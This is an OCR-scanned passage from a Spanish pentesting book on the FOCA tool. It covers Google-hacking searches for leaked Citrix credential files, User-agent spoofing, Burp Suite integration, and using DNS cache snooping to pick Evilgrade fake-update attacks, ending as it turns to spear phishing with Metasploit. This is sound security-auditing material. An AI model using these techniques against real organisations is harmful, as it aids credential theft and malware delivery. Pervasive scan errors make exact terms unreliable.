-  esa  Url  pasara  a  ser  analizada  dentro  de  todo  el  proceso  de  descubrimiento  de  red  y  busqueda  de 
vulnerabilidades. 

Si  se  quiere  encontrar  URLs  que  tengan  fugas  de  i u form ac ion,  a  lo  mejor  es  interesante  seleccionar 
URLs  con  ficheros  PHP  que  tenga  unos  determ inados  parametros,  Basta  con  hacer  uso  de  esta 
opcion  de  Custom  Search  y  aplicar  todos  Ios  conocimientos  de  Google  Hacking  o  Bing  Hacking  que 
se  tengan  para  lograr  ese  objetivo. 

Ademas,  esto  puede  usarse  tambien  incluso  sin  que  se  hay  a  ere  ado  un  proyeeto  asociado  a  un 
dominio,  por  lo  que  se  podrian  hacer  busquedas  de  documentos  con  metadatas  desde  multiples 
dominies,  como  si  fuera  un  Google  Hacking. 

Por  ejemplo,  si  se  quieren  encontrar  ficheros  de  clientes  Citrix  con  usuarios  y  contrasehas,  basta 
con  seleccionar  Custom  Search  en  el  panel  de  documentos,  borrar  todos  los  parametros  de  la 
busqueda  y  escribir  ext.  ica.  A  parti  r  de  ese  momento  FOCA  buscara  en  Google  todos  los  ficheros  de 
configuracion  de  conexiones  a  servidores  Citrix,  Una  vez  descargados  y  analizados,  se  podra  tener 
en  la  lista  de  metadatas  aquellos  usuarios  que  han  aparecido  en  cada  uno  de  estos  ficheros.  Rapido 
y  funcional. 

A  pesar  de  que  FOCA  no  anal  ice  todos  los  ficheros,  esta  opcion  puede  usarse  tambien  como  gestor 
de  descargas,  ya  que  Lras  escribir  el  comando  de  Google  Hacking  para  oblener  las  URLs  de  los 
objetivos,  se  pueden  seleccionar  los  resultados  y  deseargar  todos  los  ficheros  comodamente. 
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Obtencion  de  URLs  en  Dominios  muy  grandes 

Cuando  se  esta  auditando  on  dominio  realmente  grande,  con  miles  de  documentos  publicados  en  la 
wehy  !os  I  unites  que  nos  imponen  los  buseadores  harian  que  solo  se  pud i era  acceder  a  una  minima 
parte  de  estos  ficheros  si  utilizamos  las  opciones  de  busqueda  de  documentos  normales, 

Por  defecto,  en  el  pane!  de  documentos  se  realizan  las  busquedas  de  ios  documentos  haciendo  un 
sUe:domtnio_auditado.  Si  este  tiene  much  os  subdominios,  nos  quedaremos  sin  conseguir  las  URLs 
de  todos  ios  documentos*  por  lo  que  hay  que  buscar  olras  estrategias.  En  este  ejemplo,  eomo  se 
puede  ver,  hay  44.000  ficheros  .DOC  Indexados  en  Google ,  lo  que  hace  inviable  conseguir  estas 
direcciones  preguntando  a l  buscador  por  el  dominio  principal. 


Googl 

r  ..  , 

site:army.mil  filetype:doc  Buscar  ] 

ApFcxirnadaliente  44  4&Q  1  Biiaquedfl  avanzada 

lmageu  05.03:  Ficheros  .doc  Imiexd*\<y£  en  Google  del  dominio  army.mil 


La  primera  opcion  que  podemos  utilizar  es  la  de  realizar  las  busquedas  manualmente  usando  las 
opciones  de  Custom  Search  explicadas  en  d  pun  to  anterior.  Con  paciencia  y  artesanfa  podremos 
ir  generando  busquedas  que  den  mas  y  mas  URLs  hasta  obtener,  si  no  todas,  si  muchas  mas  de  las 
obtenidas  inicialmente. 

La  segunda  opcion  es  que  para  solucionar  este  problema  FOCA  ofrece  la  posibilidad  de  degir  el 
servidor  o  el  dominio  desde  el  que  se  desean  buseaT  los  ficheros,  de  forma  que  sea  posible  acceder 
a  todos  los  resultados  Index  ados  de  cada  uno  de  los  subdominios  o  de  eada  uno  de  los  servidores 
previamente  descubiertos*  realizando  busquedas  parciales. 
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I  m agon  05.04:  Busqueda  de  URLs  y  Documentos  por  servidor  y/o  subdominio  cn  FOCA 


Es  necesario  ir,  manualmente,  subdominio  por  subdominio  o  host  por  host  invocando  estas  opciones 
de  busqueda  de  URLs  en  Google,  busqueda  dc  URLs  cn  Bing,  Technology  Recognition  para  buscar 
solo  URLs  de  programs  o  documentos  para  obtener  las  iistas  dc  URLs  dc  este  nodo. 
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Personalizar  el  valor  del  User-agent  de  FOCA 

En  la  pestana  Network  del  menu  de  opciones  de  FOCA  es  posible  modificar  el  User-agent  usado 
por  FOCA  para  realizar  las  eonexiones  al  dominio  analizado.  El  User-agent,  en  el  ambito  HTTP 
identifica  a!  software  que  el  eliente  uliliza  para  realizar  peticiones  a  los  servidores  web,  y  no  es  mas 
que  una  cadena  de  texto  que  conti  ene  infbrmacion  como  el  nombre  del  programs  eliente,  su  numero 
de  version,  el  sistema  operativo  sobre  el  que  esta  instalado  o  el  idioma  eon  el  que  se  ha  configurado. 

De  esta  forma,  si  el  servidor  dispone  de  varias  versiones  del  contenido  a  servir  puede  elegir  la  mas 
adecuada  para  cada  eliente  basandose,  por  ejemplo,  en  el  navegador  o  en  el  idioma,  enviando  en  la 
respuesta  el  contenido  que  mejor  se  adapta  al  User-agent  que  ha  recibido  en  la  peticion. 

Mozilla/4.0  (compatible;  MSIE  S+0;  Windows  NT  6.1;  Trident/4+0) 

_ Mozilla/5.0  (compatible;  Googlebot/2. 1 ;  +HTTP\!lwww.  Gwgfe.com/bot  IFF  ML ) _ 

Irnagcn  05.05:  Ejetnplos  de  User-agent.  IE8  y  rastreadorde  Google, 

La  idea  de  servir  contenido  distinto  en  funcion  del  User-agent  tambien  se  ha  utilizado  en  muchos 
silios  webs  que  intentan  subir  posiciones  en  los  buscadores  presentando  a  estos  un  aspecto  distinto 
del  que  se  offece  a  los  usuarios,  para  lo  que  utilizan  mecanismos  como  HTTP  rewrite  que  haecn  que 
solo  se  muestren  los  resultados  si  el  User-agent  de  la  web  es  el  de  un  determ  in  ado  buscador. 

A  esta  tecniea  se  le  denomina  Cloaking,  o  Encuhri miento ,  y  ha  venido  siendo  utilizada,  a  veces 
incluso  sin  mala  intencion,  por  sitios  con  malas  caracteristicas  de  /mferacton.  Google  y  Bing 
persiguen  esta  tecnlca  eliminando  de  sus  bases  de  datos  a  los  sitios  que  la  utilizan.  Para  evitar  ser 
detectados,  en  ocasiones  algunos  administradores  utilizan  paginas  cloaked  y  no  cloaked  con  los 
imnimos  earn  bios  posibles,  es  decir,  con  el  men  or  impacto  de  contraste,  consiguiendo  asi  reducir  su 
exposieidn  a  los  procesos  automaticos  de  reconocimiento  que  utilizan  los  buscadores. 

Pero  esta  idea  en  ocasiones  tambien  es  utilizada  por  sitios  web  con  contenido  pomografico,  de  venta 
de  productos  ilegales,  etcetera,  que  comprometen  servidores  legitimos  para  incrustar  enlaces  a  sus 
sitios  web  y  asi  subir  posiciones  en  los  resultados  mostrados  por  los  buscadores.  Y  en  estos  casos  el 
cloaking  tiene  otra  ventaja  para  los  atacantes,  y  es  que  es  posible  hacer  que  las  modificaeiones  que 
realizan  en  si  tios  web  vulnerados  solo  sean  visibles  para  los  buscadores  y  pasen  desapercibidas  para 
los  administradores  de  estos  sitios  y  aquellos  que  podrian  reportarles  los  problemas  de  seguridad. 
Si  se  consigue  que  el  ataque  no  sea  detectado  se  conseguira  mantener  el  sistema  controlado  mucho 
mas  tiempo,  por  lo  que  el  atacante  puede  tener,  al  mas  puro  estilo  roof  kit,  troyanizado  un  sitio  web 
durante  mucho  tiempo  si  se  realiza  un  ajuste  fino  de  la  configuracion. 

Por  tanto,  modificar  el  User-agent  de  FOCA  (en  la  pestana  Network  del  menu  de  opciones)  para 
que  util  ice  el  de  los  bats  de  los  buscadores  en  las  peticiones  que  realice  puede  que  permita  local  izar 
mas  in  form  a  d  on  lanto  en  las  ocasiones  en  las  que  el  admin  istrador  del  sitio  analizado  ha  utilizado 
tecnicas  cloacking ,  como  en  aquellas  situaciones  en  las  que  el  sitio  haya  sido  comprometido  v 
eomenga  enlaces  a  otras  webs  sin  que  los  administradores  sean  ni  siquiera  conscientes,  aumentando 
asf  las  posibilidades  de  exito  de  la  auditoria. 
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Por  otra  parte,  debido  al  imprest onante  auge  de  los  dispositivos  moviles  como  smartphones  y  tablets 
que  se  ha  producido  en  los  ukimos  anos,  los  sitios  web  estan  desarrollando  versiones  reducidas  y 
personalizadas  de  sus  paginas  para  que  sean  visual izadas  de  la  mejor  forma  posible  en  esle  lipo  de 
dispositivos,  que  cuentan  con  pantallas  mas  reducidas  y,  habitualmente,  conexiones  mas  lentas  y  en 
los  que  los  usuarios  suelen  utilizar  los  dedos  para  la  navegacion  en  lugar  del  ratom 

Es  por  ello  que  las  versiones  para  moviles  de  los  sitios  we/?  suelen  ser  mas  ligeras,  con  menos 
imagenes  y  contenido  multimedia,  cuentan  con  botones  grandes  y  visibles,  con  textos  mas  legibles 
y  no  hacen  uso  de  elementos  como  los  menus  despegables. 

A  si,  en  la  imagen  05.06  pueden  compararse  dos  versiones  de  una  misma  web  tras  modificar  el  User- 
agent  utilizado  por  el  navegador  de  un  ordenador  portatil  para  s  i molar  ser  el  de  un  dispositivo  movil 
de  Apple  con  la  version  del  sistema  operative  iOS  5JJ: 

Mozilla/5 . 0  (iPhone?  U;  CPU  iPhone  OS  5_i_ 1  like  Mac  OS  X ;  da-dk) 
AppleWebKit/534 . 46. D  (KHTML,  like  Gecko) 

CriOS/19. 0.1084 . 60  Mabi 1 e/ 9B20 6  Safari/7534 . 48 . 3) . 
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Imagen  05.06:  Comparativa  de  las  versiones  estandar  y  movil  de  una  misma  pagina  web. 


Duranle  una  auditoria  de  un  sitio  web  puede  ser  interesanle  modificar  el  valor  del  User- agent 
de  FOCA  para  que  util  ice  el  de  algun  dispositivo  movil  con  el  objetivo  de  acceder  a  las  paginas 
personalizadas  para  este  tipo  de  equipos. 

En  una  auditoria  exhaustiva  se  deberia  repetir  el  proceso  con  tantos  valores  de  User-agent  distintos 
como  se  hay  a  detect  ado  que  la  web  esta  reconociendo  para  servir  paginas  distintas,  ademas  de  los 
de  las  aranas  de  los  buscadores  para  ver  comp  se  muestran  los  datos  a  el  los,  y  descubrir  si  el  sitio  ha 
sido  vulnerado  por  los  spammers  o  los  expertos  en  Black  SEO. 

En  muchas  ocasiones,  las  versiones  moviles  en  ocasiones  se  eneuentran  en  proceso  de  desarrollo  o 
no  han  sido  probadas  y  depuradas  de  forma  tan  exhaustiva  como  las  versiones  tradic  ion  ales,  por  lo 
que  es  posible  local  izar  bugs  y  vulnerabilidades  que  de  otra  forma  pas  art  an  inadvertidos* 
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Monitorizacion  de  FOCA:  Tareas  y  Logs 

Cuando  se  esta  analizando  un  dominio,  puede  parecer  que  en  determinados  instantes  FOCA  no  esta 
haciendo  nada,  pero  seguro  quo  esta  trabajando.  Para  saber  que  esta  pasando  con  FOCA ,  se  deben 
Lener  presentes  van  os  J  adores. 

En  primer  lugar,  FOCA  tiene  un  gestor  de  hilos  para  la  ejecucion  de  tareas.  El  numero  de  hi  I  os  que 
se  pueden  arrancar  para  realizar  estas  tareas  es  configurable  desde  las  opc  iones,  A  Hi  vienen  unos 
va lores  por  defecto  que  pueden  ser  amp li ados  hasta  I  os  l  unites  de  la  maquina. 


Imagen  05.07;  Tareas  simultaneas  que  va  a  realizar  FOCA 


El  panel  de  gestion  de  tareas  de  FOCA  esta  accesible  desde  la  op  don  del  menu  de  Task  List ,  y  en  el 
se  pueden  ver  las  tareas  en  ejecucion,  el  numero  de  tareas  encoladas  y  el  numero  de  tareas  que  se 
han  tetminado  ya. 


Quaje  taste  (33) 
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[74] :  Checking  SGlli  on  )ttp  .  auio  phpfcaram:  kt j)roducto7=120)  as  UasscStmg 

[75]  Checking  SQb  on  http arto  .php^param :  id_producto  7=1 20)  as  O a ssjc integer  __ ; 

j  [76)  Checking  SQ  Li  on  http  airto  .phptparan :  pnec»_cantidad?=0G  1 .00)  as  GasstcStnix 
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!  579]  Checking  5Q  b  on  fatp  ,  affio  +jtip(param .  «t_color7-)  an  Cbagic  Integer 

1  ]80]  Checking  SQb  on  http:.  amro.php(paran:  1utaiplus=7}  as  GkssjcStmg 

i  JB1]  Checking  SQb  on  http  /.  cap4o.phpfcaramt3taipkiB=7)as  CSasscInteger 

^  Ly-,  ■.  .-V.  .  V.  *  „vAH\..V.'.  .V.  .V.'.V.  .  ..V.  .  -  r  ..  -J.  J  1 

Ruining  tasks  i2) 
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lmagcn  05.08:  Panel  de  Task  Lis! 
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Si  el  numero  de  tare  as  que  tiene  encoladas  FOCA  es  muy  alto,  es  mejor  dejar  que  FOCA  vava 
terminandolas  y  luego  seguir  pidiendo  mas  trabajo,  Ten  presente  que  si  un  proyecto  se  detiene  y  aun 
quedan  tareas  sin  final  izar  eslas  se  van  a  perder,  as(  que  espera  para  cerrar  una  auditor!  a  eon  FOCA 
cuando  ya  no  queden  tareas. 

Por  otro  lado,  no  todas  las  aeciones  que  realiza  FOCA  llevan  asociada  la  generaeion  de  una  tarea. 
Muchas  de  las  eosas  que  tienen  que  ver  con  el  funcionamiento  del  motor  de  dascubrimiento  de  red 
y  el  analisis  de  metadatas  no  genera  una  tare  a,  pero  sin  embargo  FOCA  esta  trabajando  con  ellas,  y 
se  puede  ver. 

Para  monitorizar  ese  tipo  de  aeciones  hay  que  hacer  uso  del  Log ,  que  se  encuentra  en  el  panel 
principal  de  FOCA  en  la  parte  inferior,  donde  hay  dos  eosas  que  se  pueden  ver.  Una  el  panel  de 
configuracion,  donde  se  puede  acceder  a  lo  que  queremos  que  se  muestre  cn  la  parte  de  aeciones. 


Se  pueden  seleecionar  niveles  de  seven  dad  para  que  FOCA  solo  muestre  las  eosas  importanies  o 
tipos  de  eventos  que  queremos  que  salgan  por  modules,  para  saber  como  va  cada  una  de  las  partes 
que  componen  el  proceso  complete  con  FOCA. 
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lmageri  05.09  :  Cunfiguracion  del  log  de  FOCA 


Si  se  seleccionan  todos  los  modules  y  todos  niveles  de  severidad,  se  podra  tener  una  foto  completa 
de  todo  lo  que  esta  realizando  FOCA  en  cada  memento.  De  hecho,  cuando  FOCA  termina  de  ejecutar 
todas  las  aeciones  que  tiene  de  un  determinado  proyecto  se  podra  saber  porque  ahi  avisara  de  la 
finalizacion. 

Ese  modulo  de  log  puede  ser  tambien  una  Puente  valiosa  de  informacion,  por  lo  que  se  puede  generar 
una  copia  del  mismo  en  fichero  y  en  cualquier  momento  se  puede  resetear,  filtrar  o  actualizar.  En  el 
quedan  reflejados  todos  los  servidores  encontrados,  como  ban  si  do  encontrados,  las  vulnerabilidades 
d esc u bier! as  en  tiempo  real,  etcetera. 

Por  ultimo  debe  comprobarse  d  consume  de  memoria  que  hace  FOCA  en  cada  momento,  ya  que 
puede  irse  a  valores  de  fuerte  demanda  de  memoria.  La  herramienta  FOCA  no  utiliza  base  de  datos 
para  almacenar  toda  la  informacion,  lo  que  hace  que  este  todo  en  memoria. 

Si  el  analisis  que  se  esta  haciendo  con  FOCA  es  sobre  un  dommio  muy  grande  con  muehos  servidores 
y  subdominios,  y  sobre  el  se  han  descubierto  anadido  muchas  URLs f  se  ban  hecho  much  as  pruebas 
ya  que  han  generado  mucha  informacion,  entonces  la  gestion  del  proceso  de  FOCA  en  memoria 
puede  ser  costoso.  Ten  presente  por  tamo  que  si  vas  a  auditar  un  dominio  muy  grande,  necesitaras 
equipos  con  mucha  memoria. 
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2.  Integration  de  FOCA  con  otras  herramientas 

A  menudo  las  fun ei ones  de  FOCA  pueden  ser  ampliadas  al  utilizarla  en  conjuncion  con  otras 
herramientas.  En  esta  seed  on  vamos  a  ver  algunos  trucos  de  integration  que  pueden  ser  utiles. 


Uso  de  FOCA  con  herramientas  de  Spidering 

Hasta  d  memento  hemos  vis  to  que  FOCA  utiliza  informacion  publicada  en  Internet  para  realizar 
todos  sus  analisis.  Sin  embargo,  en  ocasiones  puede  resultar  muy  util  poder  utilizar  FOCA  con 
un  servidor  interne  de  una  organ izac ion,  o  usar  la  herramienta  para  analizar  enlaces  que  no  estan 
Indexcidos  en  las  bases  de  datos  de  I  os  busc  adores,  y  esc,  tal  y  como  esta  construida  FOCA  no  es 
posible  a  priori. 

Para  poder  utilizar  FOCA  en  estas  situaciones  es  necesario  uti  lizar  un  motor  de  Spidering  externo  y 
cargar  posteriormente  la  informacion  obtenida  a  FOCA ,  Conseguir  las  URLs  del  sitio  que  se  quiere 
analizar  se  puede  utilizar,  por  ejemplo,  Burp  Suite1 .  Esta  herramienta  fun  cion  a  como  un  proxy  local, 
y,  entre  otras  de  sus  much  as  op  ci  ones,  ofrecc  la  posibilidad  de  haccr  un  spidering  complete*  de  un 
sitio  web  que  se  hay  a  visitado. 


1  H  TTP'Jf ports  w  igger JVFTTburp^ 


fmagen  05.10:  Activation  de  spidering  en  un  sitio. 
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C  nan  do  se  activa  un  spidering  a  un  sitio  con  la  herramienla  Burp  Suite ,  hay  que  definir  el  am  bite  al 
que  se  quiere  aplicar  el  crawling.  Lo  recomendablc  a  la  bora  de  trabajar  con  FOCA  es  realizar  un 
spidering  complete  de  todo  el  dominio,  asi  que  habria  que  marcar  el  ambito  para  todo  el  dominio. 
No  obstante,  para  el  ejemplo  que  se  muestra  en  !a  imagen  05. 1 1  solo  esta  marcado  el  servidor  como 
ambito  para  la  arana. 


Imagen  05.1 1 :  Spidering  del  sitio. 

Una  vez  que  se  ha  gen  era  do  la  e  structure  del  sitio  se  dispondra  de  un  arbol  de  direceiones  Ur l  que 
podran  ser  auditadas  con  las  fund  ones  de  descubrimiento  de  red,  busqueda  de  vuinerabilidades  o 
anal  i sis  de  metadatas  con  FOCA ♦ 

Para  llevar  esas  URLs  a  un  proyecto  de  FOCA  hay  que  exportar  la  lista  completa  dc  todas  esas  URLs 
a  un  fichero  de  tipo  Jxt.  Esto  se  hace  con  la  opcion  que  tiene  Burp  Suite  de  copiar  las  URLs  de  un 
determ  inado  Host.  Despues  se  abre  un  fichero  con  un  editor  de  textos  en  formato  piano  -  el  Bloc  de 
notas  es  una  buena  opcion  -  y  se  genera  un  nuevo  fichero  eon  todas  las  URLs  pegadas. 

Ese  fichero  es  el  que  se  utilizara  para  anadir  esc  conjunto  de  URLs  a  FOCA.  Para  hacer  esto,  desde 
el  panel  de  documentos,  se  puede  hacer  uso  de  la  opcion  ‘'Anadir  links  desde  un  fichero"  y  listo. 
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Lmagen  05. 12:  Afladir  links  desde  un  fichero. 


Despues  de  eargar  esos  enlaces  desde  el  bchero,  se  mostraran  Lodos  los  enlaces  como  si  fueran  URLs 
de  documentos  a  descargar,  pero  el  motor  dc  anal i sis  de  URLs  de  los  modules  de  descubrimiento  de 
red  y  busqueda  de  vulnerabilidades  comenzara  a  trabajar  de  forma  auto  mat  icaT  pudiendo  el  usuario 
comp le tar  el  anatisis  eon  el  rcsto  de  las  o pc  i  ones  de  FOCA t 

Aqui  se  ha  utilizado  Burp  Suite ,  pero  valdria  cualquier  otra  herramienta  de  crawling  de  URLs,  e 
incluso  metiendo  las  direcciones  UrI  a  mano  es  posible  llevar  cualquier  direccion  no  recogida  por  el 
motor  de  la  FOCA  dentro  del  analisis  general  del  proyecto 


FOCA  Intruder:  FOCA  +  Burp  Suite  +  Intruder 

Con  esle  truco  !o  que  se  pretende  obteneT  es  un  informe  inicial  de  las  vulnerabilidades  mas  genericas 
y  comunes  cuando  se  hace  una  auditoria  de  seguridad  que  ya  son  detectadas  de  manera  eficiente 
tan  to  por  FOCA  como  por  Burp  Suite.  Es  decir,  como  comenzar  la  auditoria  de  seguridad  de  una 
aplicacion  web  dc  una  empresa  utilizando  la  fuerza  combinada  de  descubrimiento  de  objetivos 
y  vulnerabilidades  mas  comunes  de  FOCA  y  Burp  Suite ,  para  lanzar  a  conti  nuacion  el  modulo 
Intruder  cn  tunc  ion  de  los  resultados  obtenidos,  Un  truco  que  en  Informdtica64  era  conocido  como 
hacer  un  FOCA  Intruder. 
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Este  es  un  proceso  de  auditoria,  a si  que  los  requisites  minimos  de  hardware  y  software  para 
configurer  esle  escenario  son  los  siguientes; 

-  FOCA:  Con  todas  las  opciones  de  auditoria  a  I  maxi  mo.  . 

-  Burp  Suite :  proferentem  ente  ia  version  profesional  debido  a  las  penal izaciones  de 
rendimiento  existences  en  la  version  Free, 

-  Memoria  RAM:  a  I  menos  entire  4  y  8  GEE  en  funcion  del  tamafio  del  dominie,  seria  lo 
optimo,  FOCA  tiende  a  requerir  grandes  cantidades  de  memoria  en  base  a  los  resultados 
obtenidos  y  Burp  Suite  se  vuelve  ines  table  cuando  el  liistorial  de  navegacion  crece  demasiado 
si  no  se  le  ha  preasignado  al  menos  2  GB  al  arrancar  (en  linea  de  comandos  utilizar  el 
parametro  -Xmx2g). 

Conexion  de  red:  si  el  dominio  es  grande  se  requiere  un  buen  ancho  de  banda  para  realizar 
las  pruebas* 

Como  se  desea  que  FOCA  envfe  todas  las  pruebas  a  Burp  Suite .  es  necesario  redirecctonar  su  salida 
a  traves  de  la  direccion  IP  de  escucha  del  proxy  local  de  Burp  en  la  pestana  Network  del  menu 
OPTIONS. 


Imagcn  05.13  :  Cotrfiguracion  de  mo  de  proxy  y  modification  del  user  agent . 


Capita  !o  V  Plugins,  informes  y  otros  true  os 


187 


Pam  configurer  correctamente  en  este  escenario  hay  que  tener  en  cuenta  los  siguientes  aspeetos: 

A  la  bora  de  definir  en  el  Scope  el  dominio  a  auditar,  esie  debe  especilicarse  de  la  manera 
mas  gen  erica  posible,  es  decir,  ahadiendo  el  elemento  especificando  solamente  el  dominio 
de  la  web. 

Bn  las  opciones  de  Proxy  Listeners,  debe  eordigurarse  correctamente  la  direccion  IP  y  el 
puerto  de  escucha. 

En  las  opciones  del  Spider  hay  que  configurarlo  para  que  real  ice  el  proceso  de  manera 
automatica  sobre  los  elementos  dchnidos  en  el  Scope. 

Por  ultimo,  en  las  opciones  de  Live  Active  Scanning  hay  que  configurar  tanto  el  rnodo 
pasivo  como  el  active  de  manera  automatica  en  los  elementos  definidos  en  el  Scope . 


lmagen  05.14:  Configuration  del  esc&ner  en  vivo  de  Burp  Suite . 

Tras  configurer  am  bos  program  as  Hega  el  mo  men  to  de  empezar  la  pre-auditoria.  Para  ello,  la!  y  como 
ya  hem  os  visto  en  anteriores  capita  los,  basta  con  pulsar  los  botones  “Starf\  en  la  seccion  Network, 
y  “Search  All”  en  la  seccion  Metadata  de  FOCA .  Una  vez  obtenidos  los  resultados  comenzara  la 
auditoria  manual  de  lodes  aquellos  elementos  que  resulten  sospechosos. 

De  manera  adicional,  y  como  fase  de  mantenimiento,  es  recomen  dab  le  limpiar  con  cierla  frecuencia 
el  Historial  del  Proxy  y  revisar  que  el  escaner  active  esta  funcionando  con  normal  id  ad.  En  caso 
contrario  sera  necesario  indicarle  a  Burp  que  ana)  ice  de  manera  activa  eada  uno  de  los  subdominios 
detectados  por  FOCA ,  que  apareceran  listados  en  “Site  Map ”,  en  la  pestana  de  Target. 

Es  evidente  que  para  hacer  una  auditoria  de  seguridad  de  una  empresa  hay  que  realizar  muchas 
mas  tare  as,  pero  usar  FOCA  Intruder  puede  automatizar  gran  parte  del  trabajo  inicial  y  ayudara  al 
pentester  a  enfocar  -  nunca  mejor  dieho  -  el  resto  de  la  auditoria. 
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Malware  via  actualizaciones:  FOCA+  Evilgrade 

Evilgrade  es  mi  framework  creado  imcialmente  Francisco  Amato  que  esta  pensado  para,  una 
vcz  manjpulado  el  trafico  DNS  que  recibe  la  maquina  ataeada,  suptantar  a  I  os  servidores  que  son 
eomprobados  por  I  os  clientes  para  buscar  actualizaciones,  de  manera  que  se  puedan  com  prometer 
eslas  maquinas  clientes  mediante  una  actualization  maliciosa  que  incluya  un  troyano. 

La  version  2.0  de  la  herramienta,  que  se  presento  en  Defcon  IS  y  Black  Hat  20 JO,  incorpora  53 
modulos  distintos  para  hacer  ataques  de  este  tipo?  y  cada  uno  de  ellos  implement  los  mecanismos 
necesarios  para  emular  actualizaciones  falsas  de  una  aplicacion. 

En  la  mayoria  de  los  modules  se  consigue  ejecucidn  directa,  en  otros  es  necesaria  una  pcqueiia 
intervene  ion  del  usuario  haciendo  die  cn  a  I  gun  mensaje  de  alerta  y  en  otros,  como  en  el  caso  de 
Windows  Update ,  el  ataque  se  lleva  a  cabo  mediante  la  suplantacion  de  la  pagina  web  original  para 
hacer  un  phishing. 

El  proceso  general  de  actual izacion  de  una  aplicacion  es  el  siguiente: 

La  aplicacion  AppX  arranca  un  proceso  de  actual  izacion. 

-  Consulta  a  su  servidor  DNS  para  resolver  la  direecion  del  equipo  UpdateAppX.com, 

-  El  servidor  DNS  devuelve  la  direecion  IP  correspond iente. 

-  AppX  descarga  el  archive  HTTPJ /Update  AppX.com/idtima_actualizacion.XML  con  la 
in formaci on  d e  las  actu a l  i zac i o n e s  d i  sp on ibl e s , 

■  AppX  procesa  el  archive  y  detecta  que  existe  una  actual  izacion  nueva. 

-  AppX  descarga  la  actual  izacion  HTTP:/! Update  AppX.com/atuaIizacion.exe  y  lo  ejecuta 
para  su  instalacion. 

Los  ataques  Evilgrade  tienen  exito  porque  la  herramienta  se  aprovecha  dc  que  la  mayoria  de  las 
aplieaciones  no  verifican  la  procedencia  de  las  actualizaciones  y  conflan  en  que  el  servidor  que  les 
esta  entregando  el  Update  es  el  servidor  adecuado, 

A  si,  si  un  atacante  logra  man!  pillar  el  trafico  DNS  y  devolver  la  IP  de  un  equipo  que  el  control^ 
ya  sea  mediante  un  acceso  a  I  DNS  inter  no  de  la  compania,  realizando  un  ataque  de  DNS  Cache 
Poisoning  o  de  DNS  tampering  o,  incluso,  mediante  un  ARP  Spoofing,  de  Rogue  AP  o  de  DHCP 
hijacking  si  el  ataque  se  realiza  desde  la  red  interna  objetivo,  la  victima  descargaria  un  fichero  que 
podria  contener  un  troyano  o  un  backdoor  y,  por  tanto,  seria  comprometida  tras  su  instalacion. 

-  El  proceso  al  realizar  un  ataque  Evilgrade  seria,  por  tanto,  el  siguiente: 

-  La  aplicacion  AppX  arranca  un  proceso  de  actual  izacion. 

-  C  o  nsu  1  ta  a  s  u  servi  d  or  DNS  p ara  reso  l  ver  la  d  i  re  cc  ion  del  equ  ipo  Update.  A ppX.  co m . 

E\  atacante  manipula  el  trafico  DNS  y  devuelve  una  IP  bajo  su  control, 

-  AppX  descarga  el  archivo  H  7TP:/f  Update.  A ppX.  co  m/u  Itima  actual  izacion  XML ,  que  ha 
si  do  modificado  por  el  atacante. 
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-  AppX process  el  archive  y  detecta  que  existe  una  actual izacion  nueva. 

AppX  descarga  la  actual  izacion  HTTP:/ /Update.  AppX.com/troyano.exe  y  lo  ejeeuta  para 
su  instaiaeion,  comprometiendo  asi  la  maquina. 


Como  FOCA  incorpora  un  modulo  de  DNS  Cache  Snooping,  una  de  las  ideas  que  se  nos  ocurrio  para 
saearle  mas  partido  a  la  informacion  extraida  de  la  Cache  de  un  servidor  DNS,  es  gen  era  r  un  fichero 
con  todos  los  servidores  para  los  cuales  Evilgrade  tiene  un  modulo  de  ataque.  Este  fichero  se  genera 
directamente  desde  la  herramienta  de  Evil  Grade. 


De  esta  man  era  FOCA  puede  descubrir  cuales  de  las  URLs  de  software  vulnerable  a  Evil  Grade 
estan  siendo  requeridas  por  los  clientes  dc  la  organization  y  cuales  son  los  modulos  que  se  deberia 
preparar  en  un  posible  esquema  dc  ataque  con  Evilgrade  dentro  dc  un  proceso  dc  pentesting  dc  una 
empresa. 


Domain 

File 

Dns 


gdafe.es 

F:\BfogViacking  RXAWHgradeM 


ns2.getafe.es 

n33.getafe.es 

ns4.getafe.es 


sfe.es 


^  Obtain  DNS  servers 
Load  fie 

f  Snoop  DNS" 


Cache 


Host 
Default 
winsep  net 
www  autoitsenpt  com 
www  vm ware  com 
cygwin  .com 

ssl.google-analytics  com 
www  google-analytics.com 
windowsupdate  Microsoft  .com 
update.micTOScft.com 
www  .micTOseft  .com 
go  micrascft  com 


Imagcn  05.15:  Analisis  de  un  servidor  DNS  eon  Cache  activada  de  modules  vulnerables  a  Evil  Grade 


Utilizando  este  truco*  el  pentesier  podria  descubrir,  por  ejemplo,  que  en  el  dominio  objetivo  existen 
maquinas  eon  Windows  que  visitan  sill  os  con  Google  Analytics  ^  para  los  cuales  Evilgrade  lienc  un 
modulo  de  ataque  preparado,  que  los  usuarios  navegan  a  wimcp.com,  que  es  la  pagina  de  un  elienle 
FTP  que  tiene  activada  la  busqueda  de  actualizaciones,  o  que  al  menos  alguno  de  los  clientes  liene 
instalado  el  Antimalware  de  Clam  A  V. 


Con  tod  a  esta  informacion,  rccogida  previamente,  cl  proceso  de  preparar  un  ataque  dirigido  contra 
un  objetivo  usando  Evilgrade  se  convierte  en  una  tarea  un  poco  mas  sene  ill  a. 
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Ataques  Spear  Phising:  FOCA  +  Metasploit 

La  information  que  FOCA  obtiene  al  analizar  los  documentos  publieados  en  los  sitios  web  de  una 
compania  podria  tambien  utilizarse  para  preparar  un  ataque  Spear  Phising  durante  el  proceso  de 
auditoria  de  una  empresa, 

Estos  ataques  suelen  ser  desarrollados  per  competidores  comerciales  o  espias  industrials  con  cl 
objelivo  de  comprometer  los  sistemas  y  las  redes  de  la  organization  de  ia  vfetima  para  tratar  de 
robar  informacion  valiosa  y  secreta.  Se  basan  en  el  envio  de  un  correo  electronico  eon  un  fiehero 
adjunto  modificado  o  un  enlace  a  un  sitio  web  malic  ioso  con  la  esperanza  de  que  la  victima  con  lie 
en  el  correo  y  abra  el  fiehero  o  pinehe  en  el  enlace,  comprometiendo  asi  su  equipo  y  permitiendo  el 
acceso  a  los  atacantes,  que  usaran  este  equipo  para  acceder  al  resto  de  la  red. 

Uno  de  los  ataques  de  estas  caracteristieas  mas  impaetantes,  de  los  conocidos  por  la  opinion  publica, 
fue  el  sufrido  por  la  Oficina  Militar  de  la  Casa  Blanca  durante  el  mes  de  Octubre  de  2012,  aunque 
los  representantes  del  gobiemo  esta  do  uni  dense  negaron  que  los  criminales  pudieran  baber  obtenido 
n ingun  tipo  de  infomiacion  clasifieada.  ^Como  podria  un  auditor  utilizar  el  analisis  de  metadatas  de 
FOCA  para  preparar  un  ataque  de  estas  caracteristieas? 

